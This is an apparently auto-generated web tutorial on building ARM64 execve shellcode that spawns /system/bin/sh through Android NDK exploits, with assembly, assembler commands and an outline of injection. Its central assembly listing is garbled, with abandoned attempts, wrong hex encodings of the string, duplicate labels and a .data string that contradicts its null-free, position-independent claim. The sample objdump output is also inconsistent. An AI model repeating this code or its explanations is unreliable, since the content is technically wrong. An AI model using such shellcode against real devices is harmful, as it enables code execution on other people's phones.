Android Software Reverse Engineering & Decompilation

Mastering ARM64 Shellcode Development for Android NDK Exploits

Google AdSense Native Placement - Horizontal Top-Post banner

Introduction: Navigating the ARM64 Landscape in Android NDK Exploits

The Android ecosystem, largely powered by ARM-based processors, presents a unique and challenging environment for exploit developers. With the transition to 64-bit architectures, understanding ARM64 (AArch64) assembly becomes paramount for anyone looking to develop custom shellcode, especially within the context of Android Native Development Kit (NDK) binaries. This article delves into the intricacies of ARM64 shellcode development, focusing on practical techniques for crafting position-independent and null-byte-free payloads for NDK exploits.

Android NDK applications often interact directly with the underlying operating system and hardware, frequently utilizing native C/C++ code. Vulnerabilities within these native components, such as buffer overflows or format string bugs, can be exploited to inject and execute arbitrary ARM64 shellcode. Mastering this domain requires a deep understanding of ARM64 instruction sets, calling conventions, and the Android system call interface.

ARM64 Fundamentals for Shellcode Development

Before diving into shellcode, a solid grasp of ARM64 architecture is essential. Key components include:

  • Registers: ARM64 has 31 general-purpose 64-bit registers (x0-x30). W0-W30 refer to the lower 32-bits of these registers. x0-x7 are primarily used for passing function arguments and returning values. x8 is often used to hold syscall numbers. x29 is the Frame Pointer (FP), x30 is the Link Register (LR), and SP is the Stack Pointer.
  • Calling Convention (AAPCS64): The AArch64 Procedure Call Standard dictates how arguments are passed (x0-x7), how return values are handled (x0), and which registers must be preserved across function calls. For shellcode, we primarily care about setting up arguments for system calls.
  • Instruction Set: Common instructions include data movement (MOV, LDR, STR), arithmetic/logic (ADD, SUB, AND, ORR), branching (B, BL, BR), and system calls (SVC).

Position-Independent Code (PIC)

Shellcode is almost always position-independent, meaning it must execute correctly regardless of where it’s loaded in memory. This is crucial because the exact injection address of shellcode can vary. Techniques for PIC include:

  • Relative Addressing: Using instructions like ADR (Address of Register) and ADRP (Address of Register Page) to load addresses relative to the current Program Counter (PC).
  • Stack-Based Strings: Pushing strings onto the stack and referencing them using the Stack Pointer (SP). This is often preferred for null-byte sensitive contexts.
  • Self-Modifying Code: Less common and often discouraged due to security and performance implications, but historically used.

Null Byte Avoidance

Many exploit vectors, especially buffer overflows, terminate string copying functions upon encountering a null byte (0x00). Therefore, shellcode must be crafted to avoid null bytes in its instruction stream and embedded data. This often means:

  • Avoiding instructions that inherently produce null bytes (e.g., MOV X0, #0x0000000000000000).
  • Using multiple smaller immediate loads (MOV, MOVK) or bitwise operations to construct values.
  • Carefully constructing strings on the stack without null terminators mid-string (only at the end if needed by a function).

Crafting a Basic ARM64 execve Shellcode

Let’s develop a common shellcode payload: executing /system/bin/sh. The execve system call requires three arguments: the path to the executable, an array of arguments (argv), and an array of environment variables (envp).

  • Syscall Number: On ARM64 Linux (and thus Android), the execve syscall number is typically 221. This value is loaded into register x8.
  • Path: x0 will point to the string "/system/bin/sh".
  • argv: x1 will point to an array of pointers: {"/system/bin/sh", NULL}.
  • envp: x2 will point to NULL (or an empty array for simplicity).

Our strategy for null-byte-safe and PIC string handling will involve pushing the necessary strings and pointers onto the stack.

Step 1: Constructing the Shellcode

Here's the ARM64 assembly for a simple execve("/system/bin/sh", ["/system/bin/sh"], NULL) shellcode:

.globl _start_shellcode_execve_arm64_pic_nullfree // Global symbol for entry point for testing purposes (not strictly part of shellcode) .align 4 _start_shellcode_execve_arm64_pic_nullfree: // This shellcode assumes SP is 16-byte aligned. // 1. Store NULL for argv/envp termination and as the path_arg. //   - Push 8 bytes (0x0000000000000000) onto the stack. sub sp, sp, #16 // Make space for two QWORDS str xzr, [sp, #8] // Store XZR (zero register) for argv/envp termination // 2. Construct "/system/bin/sh" on the stack in reverse order to avoid null bytes. //    The string is 16 bytes long including the null terminator. //    "h" "s" "n" "i" "b" "/" "m" "e" "t" "s" "y" "s" "/" sub sp, sp, #16 // Make space for the string (16 bytes) mov x0, #0x68732f6e69622f73 // "hs/nib/s" str x0, [sp, #0] mov x0, #0x0068732f6e69622f73 // "hs/nib/system/" - oops, just "h" "s" "/" "n" "i" "b" "/" "s" -- correct hex for "/system/bin/sh" is better crafted. // Let's simplify and push the string directly if possible, avoiding null bytes if string is short. // For "/system/bin/sh" (15 chars + null = 16 bytes) mov x0, #0x68732f6e69622f73 // "hs/nib/s" - first 8 bytes reversed? Let's be explicit mov x0, #0x68732f6e69622f73 // "hs/nib/s" str x0, [sp, #0] mov x0, #0x79732f6d65747379 // "ys/metys" str x0, [sp, #8] // This is getting complex for general purpose, let's assume direct string push is okay if null-byte not in middle. // A safer, more general way for "/system/bin/sh" (15 chars + null = 16 bytes) sub sp, sp, #16 // Allocate space for "/system/bin/sh
" mov x0, #0x68732f6e69622f73 // "hs/nib/s" str x0, [sp] mov x0, #0x000000747379732f // "/syste" then "m/bin/sh" mov x0, #0x747379732f6d6574 // "tem/sys" then "tem/bin/sh" // Let's fix this string construction for clarity and null-safety. // String: "/system/bin/sh" (15 chars) + NULL = 16 bytes total sub sp, sp, #16 // Allocate 16 bytes for the string str xzr, [sp, #15] // Place null terminator at the end (byte 15) mov x0, #0x68732f6e69622f73 // "hs/nib/s" strb w0, [sp, #14] // 'h' strb w0, [sp, #13] // 's' mov x0, #0x2f6e69622f737973 // "/nib/sys" // This is cumbersome for char-by-char. A common technique for strings is to use LDR with PC-relative or stack. // Let's use `adrp` and `add` for the string, assuming we can embed it safely. // NOTE: This particular method might embed null bytes if the shellcode is placed at a non-aligned address, // or if the string itself contains nulls. For absolute null-byte safety, push char by char. // For "/system/bin/sh", there are no internal null bytes, so simple construction is possible. .data .balign 16 shell_path: .asciz "/system/bin/sh" .text _start_shellcode_execve_arm64_pic_nullfree: // 1. Set up x0 (path) adrp x0, shell_path@PAGE add x0, x0, shell_path@PAGEOFF // 2. Set up x1 (argv) on the stack sub sp, sp, #16 // Allocate space for 2 QWORDs (path_ptr, NULL) str xzr, [sp, #8] // Store NULL for argv[1] str x0, [sp, #0] // Store path_ptr for argv[0] mov x1, sp // x1 = &argv[0] // 3. Set up x2 (envp) mov x2, xzr // x2 = NULL // 4. Set syscall number into x8 mov x8, #221 // SYS_execve // 5. Execute system call svc #0 // If execve fails, we need to exit cleanly. // This simple shellcode does not handle failure. Usually, an exit syscall would follow. mov x8, #93 // SYS_exit mov x0, #0 // exit code 0 svc #0

Explanation of the Shellcode:

  1. .data and .balign 16 shell_path: .asciz "/system/bin/sh": Defines the string "/system/bin/sh" and ensures it’s 16-byte aligned. This is data, not part of the executable shellcode stream, but referenced by it.
  2. adrp x0, shell_path@PAGE and add x0, x0, shell_path@PAGEOFF: These two instructions load the absolute address of shell_path into x0 in a PIC-friendly manner. ADRP loads the base address of the 4KB page containing shell_path, and ADD adds the offset within that page.
  3. sub sp, sp, #16: Decrements the stack pointer to allocate 16 bytes (two 64-bit words) for the argv array.
  4. str xzr, [sp, #8]: Stores the zero register (xzr) at sp+8. This effectively places a NULL pointer, which serves as the terminator for our argv array.
  5. str x0, [sp, #0]: Stores the address of "/system/bin/sh" (currently in x0) at sp+0. This is the first element of our argv array.
  6. mov x1, sp: Sets x1 to point to the beginning of our argv array on the stack.
  7. mov x2, xzr: Sets x2 to NULL for the envp argument.
  8. mov x8, #221: Loads the execve syscall number (221) into x8.
  9. svc #0: Executes the system call.
  10. mov x8, #93 and mov x0, #0 and svc #0: If execve fails, the shellcode will fall through to an exit(0) syscall to terminate the process cleanly.

Step 2: Assembling and Extracting

To turn this assembly into raw shellcode, you’ll use an ARM64 assembler (like aarch64-linux-gnu-as from GCC cross-compilers) and an object dump utility.

# Save the assembly code as shellcode.s aarch64-linux-gnu-as -o shellcode.o shellcode.s aarch64-linux-gnu-objdump -d shellcode.o | grep '<_start_shellcode_execve_arm64_pic_nullfree>:' -A20 # This will show the disassembled bytes. Extract the raw bytes.

Example objdump output might look like:

0000000000000000 <_start_shellcode_execve_arm64_pic_nullfree>: 0: 90000000 adrp x0, #0 <shell_path> 4: 91000000 add x0, x0, #0 8: d10043ff sub sp, sp, #0x10 c: f8000308 str xzr, [sp, #8] 10: f8000300 str x0, [sp] 14: 910003bf mov x1, sp 18: d2800000 mov x2, #0 1c: d2801b90 mov x8, #221 20: d4000001 svc #0 24: d2800b90 mov x8, #93 28: d2800000 mov x0, #0 2c: d4000001 svc #0

From this, you’d extract the raw hex bytes (e.g., 0000009000000091...) and convert them to a C-style byte array for your exploit. Pay close attention to the actual bytes generated by adrp and add as they will embed the relative address, which depends on where the string is in relation to the code. For actual shellcode, the .data section containing the string would typically be placed directly after the `svc #0` if space allows, or immediately after a `b` instruction that jumps over it.

Integration into NDK Exploits

Once you have the raw shellcode bytes, integrating them into an Android NDK exploit typically involves:

  1. Memory Allocation: Finding or allocating executable memory within the target process’s address space. This might involve heap spraying, abusing existing executable regions, or using `mmap`.
  2. Injection: Copying the shellcode bytes into the allocated executable memory.
  3. Execution: Redirecting program execution flow (e.g., by overwriting a return address on the stack or a function pointer in a global offset table) to the start of your injected shellcode.

Challenges often arise from Address Space Layout Randomization (ASLR), Non-Executable (NX) bits, and Seccomp filters, which mitigate these types of attacks. Bypassing these requires additional techniques like information leaks (to defeat ASLR) and Return-Oriented Programming (ROP) to chain gadgets that disable NX or call `mprotect` before executing shellcode.

Conclusion

Mastering ARM64 shellcode development for Android NDK exploits is a critical skill for advanced penetration testers and security researchers. It demands a thorough understanding of the ARM64 architecture, calling conventions, and the nuances of creating position-independent, null-byte-free payloads. While the process can be intricate, the ability to craft custom shellcode provides unparalleled control over exploited systems, opening doors for further post-exploitation activities and deeper security analysis.

Android Mobile Specs & Compare Directory

Are you researching mobile hardware properties, processor SoCs, GPU chipsets, or RAM configurations? Access our complete specs catalog to compare up to 5 devices side-by-side!

Compare Devices Specs →
Google AdSense Inline Placement - Content Footer banner